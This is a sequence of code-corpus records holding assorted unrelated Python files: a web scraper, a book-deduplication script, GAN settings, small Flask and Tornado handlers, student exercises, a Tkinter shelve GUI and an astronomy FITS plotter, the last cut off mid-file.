\"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\"\n ]\n headers = {'User-Agent': random.choice(USER_AGENTS)}\n with open('ip.json', 'r') as file:\n data = json.load(file)\n try:\n r = requests.get(url=url, headers=headers, proxies=random.choice(data))\n r.raise_for_status()\n soup = BeautifulSoup(r.text, 'lxml')\n movie_info1 = soup.find(\"div\", class_=\"movie-brief-container\")\n name = movie_info1.find('h3', class_=\"name\").get_text()\n other = movie_info1.find('ul').text.replace('\\n', \" \")\n jianjie = soup.find('div', class_=\"mod-content\").text\n comments_list = []\n comments = soup.find_all('li', class_=\"comment-container\")\n for each in comments:\n comments_list.append(each.find('div', class_=\"comment-content\").get_text())\n info = {\"name\": name,\n \"other\": other,\n \"jianjie\": jianjie,\n \"comments\": comments_list}\n return info\n except:\n logger.error(traceback.format_exc())\n return None\n\n\nif __name__ == '__main__':\n # pretty_dict(find_vip_movie())\n\n # write_json()\n # print(get_movies_info(\"调音\"))\n\n a = find_all_movies()\n print(a)\n","sub_path":"xinfulanhai.py","file_name":"xinfulanhai.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"476538025","text":"# -*- coding: utf-8 -*-\n#importar libreria para Jaro\nimport jellyfish\nimport time\nimport sys\n\n#definir variables\nanio = 2016\n\nstart_time = time.time()\nlistaLibros = [] \nlistaLibrosDedup = []\nv_producion1 = v_persona_id1 = v_produccion2 = v_persona_id2 = v_anio1 = v_anio2 = 0\nv_titulo1 = v_titulo2 = v_isbn1 = v_isbn2 = v_isbn1_fuzzy = v_isbn2_fuzzy = v_titulo1_fuzzy = v_titulo2_fuzzy = v_editorial1 = v_editorial2 = v_idioma_id1 = v_idioma_id2 = \"\"\nv_factor_jaro = 0\nv_factor_jaro_minimo = 0.88\nv_se_inserto = 0 \n\npath_carpeta_archivos = \"/home/mpierri/deduplicar_libros\"\npath_lote_completo = path_carpeta_archivos + \"/listado_libros_completo_\" + str(anio) + \".txt\"\npath_deduplicar = path_carpeta_archivos + \"/listado_libros_deduplicar_\" + str(anio) + \".txt\"\npath_archivo_salida = path_carpeta_archivos + \"/listado_libros_fuzzy_\" + str(anio) + \".txt\"\n\n#path_carpeta_archivos = \"C:\\pdi-ce-5.3.0.0-213\\libros_anios_eva_20170625\"\n#path_lote_completo = path_carpeta_archivos + \"\\listado_libros_completo_\" + str(anio) + \".txt\"\n#path_deduplicar = path_carpeta_archivos + \"\\listado_libros_deduplicar_\" + str(anio) + \".txt\"\n#path_archivo_salida = path_carpeta_archivos + \"\\listado_libros_fuzzy_\" + str(anio) + \".txt\"\n\n#se abre el archivo de capitulos de libro para lectura\nf = open(path_lote_completo,\"r\", encoding=\"latin-1\") #abre el archivo con el lote completo de libros\nf2 = open(path_deduplicar,\"r\", encoding=\"latin-1\") #abre el archivo con el lote a buscar duplicados\nfd = open(path_archivo_salida,\"w\")\n\n#se leen las lineas del archivo y se ponene en una lista\nfor line in f:\n listaLibros.append(line)\nf.close()\n#cargo en una lista el listado de libros a deduplicar\nfor line in f2:\n listaLibrosDedup.append(line)\nf2.close()\n\n#itero sobre la coleccion de libros para ir tomando de a 1 y comparando con el resto\n#salvo el mismo libro\n\n#iteracion principal\nfor x in range(len(listaLibrosDedup)): \n #lee los datos del articulo a buscar duplicado\n v_produccion1, v_persona_id1, v_titulo1,v_titulo1_fuzzy, v_isbn1, v_isbn1_fuzzy, v_idioma_id1, v_editorial1, v_anio1 = listaLibrosDedup[x].split(\"|\")\n v_se_inserto = 0 #inicializo la marca \n v_factor_jaro_titulo = 0 #se inicializa para cada libro a deduplicar\n \n for y in range(len(listaLibros)):\n #lee los datos del articulo a comparar\n v_produccion2, v_persona_id2, v_titulo2, v_titulo2_fuzzy, v_isbn2, v_isbn2_fuzzy, v_idioma_id2, v_editorial2, v_anio2 = listaLibros[y].split(\"|\")\n \n #se fija que no se compare el mismo produccion_id \n if(v_produccion1 != v_produccion2):\n #calculo el fuzzy de Jaro con los titulos de los libros\n v_factor_jaro = round(jellyfish.jaro_distance(v_titulo1_fuzzy, v_titulo2_fuzzy),2)\n \n # Verifico si el isbn2_fuzzy viene vacio y le pongo un cero para que en la comparacion siguiente\n # no lo considere igual a otro isbn si exise\n if(v_isbn2_fuzzy.strip() == ''):\n v_isbn2_fuzzy = '0'\n \n # si el factor jaro es mayor o igual al minimo seteado o los ISBN son iguales \n # o si los ISBN son iguales y no son cero\n # tenemos un duplicado y se se agrega en el archivo de salida\n if(v_factor_jaro >= v_factor_jaro_minimo):\n #inserto en el archivo de destino el duplicado\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 +'|' + str(v_factor_jaro) + '|' + v_produccion2 + '|' + v_persona_id2.replace('\\n', '') + '|' + v_titulo2 + '|' + v_titulo2_fuzzy + '|' + v_isbn2 + '|' + v_isbn2_fuzzy + '|' + v_idioma_id2 + '|' + v_editorial2 + '\\n')\n #se usa para control mas adelante\n v_se_inserto = 1 \n \n else:\n if((v_factor_jaro >= 0.80 and v_factor_jaro < v_factor_jaro_minimo) and (v_isbn1_fuzzy == v_isbn2_fuzzy and int(v_isbn2_fuzzy) != 0)):\n #inserto en el archivo de destino el duplicado\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 +'|' + str(v_factor_jaro) + '|' + v_produccion2 + '|' + v_persona_id2.replace('\\n', '') + '|' + v_titulo2 + '|' + v_titulo2_fuzzy + '|' + v_isbn2 + '|' + v_isbn2_fuzzy + '|' + v_idioma_id2 + '|' + v_editorial2 + '\\n')\n #se usa para control mas adelante\n v_se_inserto = 1 \n #se verifica si el jaro esta entre 0.80 y 0.87 y que uno o los dos ISBN esten vacios\n #verifico si los isbn estan cargados\n if((v_factor_jaro >= 0.80 and v_factor_jaro < v_factor_jaro_minimo) and (v_isbn1.strip() == '' or v_isbn2.strip() == '')) :\n #inserto en el archivo de destino para revision manual\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 +'|' + str(v_factor_jaro) + '|' + v_produccion2 + '|' + v_persona_id2.replace('\\n', '') + '|' + v_titulo2 + '|' + v_titulo2_fuzzy + '|' + v_isbn2 + '|' + v_isbn2_fuzzy + '|' + v_idioma_id2 + '|' + v_editorial2 + '\\n')\n #se usa para control mas adelante\n v_se_inserto = 1\n \n #FIN 2do for\n #el libro comparado no tiene duplicado\n if(v_se_inserto == 0):\n #inserto en el archivo de destino\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 + '|' + '0.00' + '|' + '|' + '|' + '|' + '|' + '|'+ '|'+ '|'+ '|') \n \n if x != len(listaLibrosDedup)-1:\n fd.write('\\n') \n#cierra el archivo destino \nfd.close()\n\nprint(\"--- %s SEGUNDOS ---\" % (time.time() - start_time))\nsys.exit(0)\n","sub_path":"deduplicar_libros/deduplicar_libros.py","file_name":"deduplicar_libros.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"419975044","text":"import tensorflow as tf\nfrom other.nn_func import leaky_relu\nimport tensorflow.contrib.layers as ly\n\n# Created in nn_func.py, instead of importing from here.\n# WEIGHT_INITIALIZER = tf.truncated_normal_initializer(stddev=0.01)\n\n# Optimizer hyper parameters for discriminator\nOPTIMIZER_DIS_HP = {'learning_rate': 0.0001,\n 'optimizer': tf.train.AdamOptimizer,\n 'lambda': 10, # coefficient when compute gradient penalty, only for Dis optmzr\n 'clip': 0.01\n }\n\nOPTIMIZER_GEN_HP = {'learning_rate': 0.0001,\n 'optimizer': tf.train.AdamOptimizer,\n }\n\n# Generator hyper parameters\nGENERATOR_HP = {'z_dim': 128,\n 'gf_dim': 64,\n # 'emb_reduced_dim': 256,\n # 'kernel_size': 3,\n # 'stride': 2,\n 'act_fn': tf.nn.relu,\n 'norm_fn': ly.batch_norm,\n # 'normalizer_fn': None,\n # 'weights_initializer': tf.truncated_normal_initializer(stddev=0.01)\n }\n\n# Discriminator hyper parameters\nDISCRIMINATOR_HP = {'df_dim': 64,\n 'emb_reduced_dim': 8 * 64,\n # 'kernel_size': 3,\n # 'stride': 2,\n 'act_fn': leaky_relu,\n 'norm_fn': None,\n # 'weights_initializer': tf.truncated_normal_initializer(stddev=0.01),\n }\n","sub_path":"model_911/hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"41321997","text":"import json\nfrom flask import Flask, request\n# from tweet_listener import get_tweets\n# from sentiment_analyzer import get_tweet_sentiments\n\napp = Flask(__name__)\napp.config.update(\n DEBUG=True,\n SECRET_KEY='EVERTWEET'\n)\n\n@app.route('/getTwitterData/', methods=['GET', 'POST'])\ndef getTwitterData(username):\n\ttweets = request.post('', json=username)\n\treturn json.dumps(tweets)\n\n@app.route('/getSentimentList/', methods=['GET', 'POST'])\ndef get_sentiment_list(username):\n # tweets = get_tweets(username)\n tweets = request.post('', json=username)\n sentiments = request.post('', json=json.loads(tweets))\n return json.dumps(sentiments)\n\nif __name__ == '__main__':\n app.run(port=8080, host='0.0.0.0')\n","sub_path":"example/EverTweet-Lambda/backend/orchestrator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"338491754","text":"#Assignment 8\n#Coded by Daniel Sim - 2011/08/06\n\n#This program reads in text from the keyboard until an exclamation mark is found.\n#It then counts the instances of each letter, and the total of other characters.\n#Finally, it figures out which letter(s) were found the most and least often.\n\nimport re;\n\ndef main():\n\n nonlettercheck = \"[^A-Z]\";\n\n inputlist = [];\n letterlist = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\\\n \"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"];\n lettercount = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];\n othercount = 0;\n letter = \"\";\n greatestnum = 0;\n leastnum = 1;\n mostletter = [];\n leastletter = [];\n msg = input(\"Enter a string here (will stop reading at \\\"!\\\"): \");\n for letter in msg:\n if letter != \"!\" and len(letter) != 1:\n print(\"Invalid input! Must be a single character!\");\n elif letter == \"!\":\n break;\n else:\n inputlist.append(letter.upper());\n leastnum += 1;\n letter = \"\";\n for character in range(len(inputlist)):\n if not re.search(nonlettercheck, inputlist[character].upper()):\n lettercount[letterlist.index(inputlist[character])] += 1;\n else:\n othercount += 1;\n for num in range(len(lettercount)):\n if lettercount[num] > 0:\n print(\"Number of\", letterlist[num] + \"'s:\", lettercount[num]);\n print(\"Number of other characters:\", othercount);\n\n for num in range(len(lettercount)):\n if lettercount[num] > greatestnum:\n mostletter = [];\n mostletter.append(letterlist[num]);\n greatestnum = lettercount[num];\n elif lettercount[num] == greatestnum:\n mostletter.append(letterlist[num]);\n print(\"Letter(s) that was/were found the most:\", mostletter);\n \n for num in range(len(lettercount)):\n if lettercount[num] < leastnum and lettercount[num] != 0:\n leastletter = [];\n leastletter.append(letterlist[num]);\n leastnum = lettercount[num];\n elif lettercount[num] == leastnum:\n leastletter.append(letterlist[num]);\n print(\"Letter(s) that was/were found the least, but at least once:\", \\\n leastletter);\n\nif __name__ == \"__main__\":\n main();\n\n","sub_path":"schoolwork/NYU_IntroToCP_Summer2011/Sim_Daniel_assign8b.py","file_name":"Sim_Daniel_assign8b.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"484538762","text":"\"\"\"\nGiven a non-empty binary search tree and a target value, find the value in the BST that is closest to the target.\n\nNote:\n\nGiven target value is a floating point.\nYou are guaranteed to have only one unique value in the BST that is closest to the target.\nExample:\n\nInput: root = [4,2,5,1,3], target = 3.714286\n\n 4\n / \\\n 2 5\n / \\\n1 3\n\nOutput: 4\n\"\"\"\n\n#TC O(H)\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def closestValue(self, root, target):\n closest = root.val\n while root:\n closest = min(root.val, closest, key = lambda elem: abs(target - elem))\n root = root.left if target < root.val else root.right\n return closest\n","sub_path":"270_closest_bin_Search.py","file_name":"270_closest_bin_Search.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264445070","text":"# Write a Python program that finds out who ate the ice cream. Your country will be grateful!\r\n\r\n# Hint: There are Python functions that help you find a string within a string.\r\n\r\nimport json\r\n\r\n# 1. Dictionary of DNA traits\r\nhair = {\r\n \"black\": \"CCAGCAATCGC\",\r\n \"brown\": \"GCCAGTGCCG\",\r\n \"blonde\": \"TTAGCTATCGC\"\r\n }\r\n\r\nface = {\r\n \"square\": \"GCCACGG\",\r\n \"round\": \"ACCACAA\",\r\n \"oval\": \"AGGCCTCA\"\r\n }\r\n\r\neyes = {\r\n \"blue\": \"TTGTGGTGGC\",\r\n \"green\": \"GGGAGGTGGC\",\r\n \"brown\": \"AAGTAGTGAC\"\r\n }\r\n\r\ngender = {\r\n \"female\": \"TGAAGGACCTTC\",\r\n \"male\": \"TGCAGGAACTTC\"\r\n }\r\n\r\nrace = {\r\n \"white\": \"AAAACCTCA\",\r\n \"black\": \"CGACTACAG\",\r\n \"asian\": \"CGCGGGCCG\"\r\n }\r\n\r\n# 2. Dictionary of suspects with a list of their traits taken from the dictionary\r\n\r\nsuspects = {\r\n \"Eva\": [\"female\", \"white\", \"blonde\", \"blue\", \"oval\"],\r\n \"Larisa\": [\"female\", \"white\", \"brown\", \"brown\", \"oval\"],\r\n \"Matej\": [\"male\", \"white\", \"black\", \"blue\", \"oval\"],\r\n \"Miha\": [\"male\", \"white\", \"brown\", \"green\", \"square\"]\r\n }\r\n\r\n\r\n# 3. We have all dictionaries and our suspects. Next, import the suspect's DNA:\r\n\r\nwith open(\"dna.txt\", \"r\") as suspect_file:\r\n dna = suspect_file.read()\r\n\r\n# And make the suspect blank value:\r\n\r\nperson = []\r\n\r\n# 5. now we have to make a program that looks for traits in the suspect's DNA\r\n\r\nfor i in gender:\r\n if gender[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in race:\r\n if race[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in hair:\r\n if hair[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in eyes:\r\n if eyes[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in face:\r\n if face[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\n# 6. This will give us the suspect's description. Now to compare who matches:\r\n\r\nfor p in people:\r\n if suspects[s] == person:\r\n print(\"The person we're looking for is {0}\".format(s.upper()))\r\n break\r\n","sub_path":"hw_11.4_1.py","file_name":"hw_11.4_1.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"367887213","text":"from snake.scale import FileType, scale\n\n\nNAME = \"pefile\"\nVERSION = \"1.0\"\n\nAUTHOR = \"Matt Watkins\"\nAUTHOR_EMAIL = \"matthew.watkins@countercept.com\"\n\nDESCRIPTION = \"a module to perform pe analysis on PE files\"\n\nLICENSE = \"https://github.com/countercept/snake-scales/blob/master/LICENSE\"\n\nURL = \"https://github.com/countercept/snake-scales\"\n\n\n__scale__ = scale(\n name=NAME,\n description=DESCRIPTION,\n version=VERSION,\n author=AUTHOR,\n supports=[\n FileType.FILE\n ],\n)\n","sub_path":"pefile/pefile/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"156983025","text":"import numpy as np\n\n\ndef explore(C, alpha, R):\n n = np.shape(C)[0]\n\n # Compute scores\n S = C / np.sqrt(alpha)\n\n # Compute cosines\n C2 = C * C\n sumObs = np.sum(C2, axis=1)\n q = np.transpose(np.transpose(C2) / sumObs)\n\n # Compute contributions\n beta = C2 / (alpha * n)\n\n # Compute commonalities\n R2 = R * R\n common = np.cumsum(R2, axis=1)\n return S, q, beta, common\n","sub_path":"adaLabs/EFA/efa/EFA.py","file_name":"EFA.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"104078648","text":"import shelve\nfrom tkinter import *\nfrom tkinter.messagebox import showerror\n\nfile_name = 'class-shelve'\nfieldnames = ('name', 'age')\n\ndef make_widgets():\n global entries\n window = Tk()\n window.title('These people')\n form = Frame(window)\n form.pack()\n entries = {}\n for (ix, label) in enumerate(('key', ) + fieldnames):\n lab = Label(form, text = label)\n ent = Entry(form)\n lab.grid(row = ix, column = 0)\n ent.grid(row = ix, column = 1)\n entries[label] = ent\n btn_fetch = Button(form, text='Fetch', command = (lambda: fetch()))\n btn_fetch.grid(row = 3, column = 0)\n btn_update = Button(form, text = 'Update', command = (lambda: update()))\n btn_update.grid(row = 3, column = 1)\n return window\n\n\ndef fetch():\n print('fetch!')\n key = entries['key'].get()\n try:\n record = db[key]\n except:\n showerror(title='Error', message='No such key!')\n else:\n for field in fieldnames:\n entries[field].delete(0, END)\n entries[field].insert(0, repr(getattr(record, field)))\n\n\ndef update():\n key = entries['key'].get()\n if key in db:\n record = db[key]\n else:\n from Person import Person\n record = Person(name = '?', age = '?')\n for field in fieldnames:\n setattr(record, field, entries[field].get())\n db[key] = record\n\n\ndb = shelve.open(file_name)\nwindow = make_widgets()\nwindow.mainloop()\ndb.close()","sub_path":"codinPython/db/peoplegui.py","file_name":"peoplegui.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"633497415","text":"#성공회대학교 대학기구_학생복지처 페이지 긁어오기\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup, Tag\n\ndef run():\n html = urlopen(\"http://www.skhu.ac.kr/uni_int/uni_int_5_4.aspx\") #성공회대학교 대학기구-학생복지처 url\n bs0bj = BeautifulSoup(html.read(),\"html.parser\")\n\n #공통된 번호 저장 및 출력\n main = \"대표전화 02)2610-4114 / 팩스 02)2683-8858/ 야간전화 02)2610-4119/ 직통전화 02)2610 + 교내번호\"\n print(main)\n\n # for문을 사용하여 원하는 부분을 추출 및 출력\n data = list()\n for child in bs0bj.find(\"table\",{\"class\":\"cont_a mt20 ml20 w690\"}).tbody.children:\n if isinstance(child, Tag): #child의 타입이 Tag인지 확인\n item = child.findAll(\"td\")\n data.append({\"title\":item[0].get_text(), #소속\n \"name\":item[1].get_text(), #이름\n \"class\":item[2].get_text(), #직책\n \"task\":item[3].get_text(), #업무\n \"phone\":item[4].get_text(), #내선번호\n \"fax\":item[5].get_text() }) #fax번호\n\n return data\n","sub_path":"skhufeeds/crawlers/crawlers/info/welfare_student.py","file_name":"welfare_student.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"514063685","text":"import tornado.web\n\nimport logging\n\nfrom .base import BaseJsonHandler\n\nlog = logging.getLogger(__name__)\n\n\nclass SetHandler(BaseJsonHandler):\n \"\"\"INPUT: {\n \"uuid\": \"7D311B4D-F069-4247-AB03-31D366B58BE8\",\n \"nick\": \"GrivIN\",\n \"udistance\": 100,\n \"hashtag\": \"\",\n \"LocationLatitude\": -126.4,\n \"LocationLongitude\": 45.3201,\n \"LocationAltitude\": 0,\n \"LocationSpeed\": 0,\n \"LocationTimestamp\": 0,\n \"message\": \"Łolaboga jakie jaja\"\n }\n OUTPUT: HTTP 200 status only\n \"\"\"\n\n def main(self):\n message = self._set_message()\n user_ask = self._user_ask()\n\n yield [message, user_ask]\n\n self.output_data = ''\n\n def check_json_args(self):\n for x in (\n # 'lang', - optional\n 'uuid',\n 'nick',\n 'message',\n 'distance',\n 'hashtag',\n 'LocationLatitude',\n 'LocationLongitude',\n 'LocationAltitude',\n 'LocationTimestamp'):\n if x not in self.json_args:\n log.error('%s Missed value in POST: %s', self.json_args.get('uuid', 'NaN'), x)\n raise tornado.web.HTTPError(400)\n\n def _set_message(self):\n return self.db.execute(\"\"\"INSERT INTO\n messages (\n uuid_id,\n nick,\n message,\n udistance,\n hashtag_id,\n location_latitude,\n location_longitude,\n location_altitude,\n location_timestamp,\n location,\n show_azimuth)\n VALUES (\n %(uuid_id)s,\n %(nick)s,\n %(message)s,\n %(distance)s,\n %(hashtag_id)s,\n %(LocationLatitude)s,\n %(LocationLongitude)s,\n %(LocationAltitude)s,\n %(LocationTimestamp)s,\n ST_GeomFromText('POINT(%(LocationLatitude)s %(LocationLongitude)s)', 4326),\n %(showAzimuth)s\n );\n \"\"\", self.json_args)\n","sub_path":"hiserver/handlers/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"48963549","text":"import pandas as pd\nimport numpy as np\nimport math\n\ndict_reduced = {}\ntrain = 0\nnr_cities = 0\nmax_id = 0\nconditional = 0\n\n\ndef main():\n global train\n global nr_cities\n global max_id\n global conditional\n\n #load train data\n train = pd.read_csv('../booking_train_set.csv')\n\n TopCities = pd.DataFrame\n\n TopCities=train.groupby(\"city_id\").count()\n TopCities.to_excel(\"TopCities.xlsx\")\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"booking_challenge/OldAttempt/Adrian_test/TopCities.py","file_name":"TopCities.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173079311","text":"# Helper functions and global variables across the system\n\nimport sys\n\n# Maintains all the ideas\n# Ensures no idea is repeated\n# The is a dictionary of ideas\n# Key: idea name\n# Value: idea link object {idea, idea chains it is apary of}\nideas = dict()\n\n# SUCCESS CODES\nSUCCESS = 0\n\n# ERROR CODES\nDNE_ERR = 1\n\n# Print Toggle\nPRINT = True\n\n############ PRINTING ############\n# Wrapper function that allows toggling printing with just a global variable\ndef printe(*values, sep=' ', end='\\n', file=sys.stdout, flush=False):\n if PRINT:\n # Append all the values together\n print_str = \"\"\n for value in values:\n print_str += str(value)\n\n # Print the resulting string\n print(print_str, sep=sep, end=end, file=file, flush=flush)\n\n\n############ IDEA INITIALIZATION ##############\n# Creates a globally unique id for the idea\ndef create_id(idea):\n # Get the base of the name\n idea_name = idea.get_idea_name()\n\n # Append numbers to the name to differentiate ideas with the same name\n idea_id = idea_name\n\n # Keep incrementing the counter until we find an index that hasnt been used yet\n counter = 0\n while idea_id in ideas.keys():\n idea_id = idea_name + str(counter)\n counter += 1\n\n return idea_id\n\n# Creates a file and tracker for an idea in order to store it\n# also makes ideas globally unique \ndef create_storage(idea):\n # Get the id of the idea\n file_name = idea.get_idea_id()\n\n # Create the file based on the name\n with open(file_name + \".brn\", \"w+\") as f:\n # Write the idea to the file initially\n f.write(idea.get_idea_name())\n\n return file_name\n\n######## IDEAS ##########\n# Add the idea to the global dictionary of ideas. Key is by id\ndef add_idea(idea):\n idea_key = idea.get_id()\n ideas[idea_key] = idea\n\n# Remove a group of ideas\ndef remove_ideas(ideas):\n for idea in ideas:\n remove_idea(idea)\n\n# Remove a single idea:\n# - Remove all idea chains that contain the idea\n# - Remove it from the global index\n# - Remove its file from the storage\ndef remove_idea(idea):\n pass\n\n# Find an idea by its name\ndef find_idea_by_name(idea_name_to_find):\n if idea_name_to_find in ideas.keys():\n return ideas[idea_name_to_find]\n else:\n printe(\"Idea name does not exist\")\n return ","sub_path":"brain/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"652200109","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QInputDialog, QLineEdit, QFileDialog\r\nfrom PyQt5.QtGui import QIcon\r\nimport PyQt5.QtWidgets as qt\r\nimport matplotlib.pyplot as plt\r\nfrom astropy.visualization import astropy_mpl_style\r\n\r\n\r\nfrom PyQt5.QtWidgets import *\r\nprint(QStyleFactory.keys())\r\n\r\napp = QApplication\r\napp.setStyle('Fusion')\r\n\r\nfrom astropy.io import fits\r\nimport numpy as np\r\n\r\n# GUI initiation\r\nclass App(QWidget):\r\n # Sets geometry of main body\r\n def __init__(self):\r\n # need super else error\r\n super().__init__()\r\n self.title = 'Flux and wavelength plotter'\r\n self.left = 500\r\n self.top = 500\r\n self.width = 440\r\n self.height = 280\r\n self.layout0 = qt.QGridLayout()\r\n self.layout = qt.QGridLayout()\r\n self.group_box_settings = QGroupBox(self)\r\n self.group_box_settings.setTitle(\"Select a file to enable these many magic tricks\")\r\n\r\n self.initUI()\r\n\r\n # Creates parts inside the main UI such as buttons that connect to functions when pushed\r\n def initUI(self):\r\n\r\n # Set title of window and its geometry to previously defined values\r\n self.setWindowTitle(self.title)\r\n self.setGeometry(self.left, self.top, self.width, self.height)\r\n\r\n\r\n\r\n # File explorer to select a fits file to later plot. Can change to other files later if they are ever plottable\r\n self.filechoose = qt.QPushButton('Choose fits file to plot from')\r\n self.layout0.addWidget(self.filechoose, 0, 0, 1, 2)\r\n self.filechoose.clicked.connect(self.saveFileDialog)\r\n\r\n # Plot the chosen file with the file address storedfrom saveFileDialog function\r\n self.plotbutton = qt.QPushButton('Plot Wavelength against Flux')\r\n self.layout.addWidget(self.plotbutton, 1, 0, 1, 2)\r\n self.plotbutton.setEnabled(False)\r\n self.plotbutton.clicked.connect(self.PlotWF)\r\n\r\n # Prints all headers when pressed\r\n self.prnthdrsbutton = qt.QPushButton('View all headers')\r\n self.layout.addWidget(self.prnthdrsbutton, 2, 0, 1, 2)\r\n self.prnthdrsbutton.setEnabled(False)\r\n self.prnthdrsbutton.clicked.connect(self.prnthdrs)\r\n\r\n # Box to input text to search for in the headers and comments and values\r\n self.searchhdrsbox = qt.QLineEdit('Search for a header/comment')\r\n self.layout.addWidget(self.searchhdrsbox, 3, 0, 1, 1)\r\n self.searchhdrsbox.setEnabled(False)\r\n # Connects pressing enter with the search button\r\n self.searchhdrsbox.returnPressed.connect(self.searchhdrs)\r\n self.searchhdrsbox.mousePressEvent = lambda _: self.searchhdrsbox.selectAll()\r\n\r\n # Actually searches for the hdrs box text\r\n self.searchhdrsbttn = qt.QPushButton(\"Search\")\r\n self.layout.addWidget(self.searchhdrsbttn, 3, 1)\r\n self.searchhdrsbttn.setEnabled(False)\r\n self.searchhdrsbttn.clicked.connect(self.searchhdrs)\r\n\r\n\r\n self.group_box_settings.setLayout(self.layout)\r\n self.layout0.addWidget(self.group_box_settings)\r\n self.setLayout(self.layout0)\r\n\r\n self.show()\r\n\r\n\r\n\r\n # Function for choosing file path to plot later, also enables the plot button.\r\n def saveFileDialog(self):\r\n # Parent of self, no directory or name, but restricted to fits files\r\n self.filePath = QFileDialog.getOpenFileName(self, '', '', '*.fits')[0]\r\n print(self.filePath)\r\n if self.filePath:\r\n # In case I need the name of the file itself.\r\n self.fileName = self.filePath.split(\"/\")[-1]\r\n self.image_data = fits.open(self.filePath, ext=0)\r\n\r\n print(self.fileName)\r\n self.plotbutton.setEnabled(True)\r\n self.prnthdrsbutton.setEnabled(True)\r\n self.searchhdrsbox.setEnabled(True)\r\n self.searchhdrsbttn.setEnabled(True)\r\n\r\n\r\n # Function to plot the chosen fits file.\r\n def PlotWF(self):\r\n\r\n # the .data values of the file which is the flux in this case\r\n flux=(self.image_data[0].data)\r\n\r\n # Takes the value of CRVAL1 which is the initial angstrom wavelength\r\n starter = self.image_data[0].header['CRVAL1']\r\n # The step in wavelength per data point taken from CDELT1\r\n steps = self.image_data[0].header['CDELT1']\r\n # Making a list with the interval of steps\r\n wlist = starter + (steps*np.arange(self.image_data[0].header['NAXIS1']))\r\n\r\n\r\n # Plot the figure with thinner lines and show it\r\n plt.figure()\r\n plt.plot(wlist,flux,linewidth=0.1)\r\n plt.xlabel( 'Wavelength (A)')\r\n plt.title(str(self.fileName))\r\n plt.ylabel( 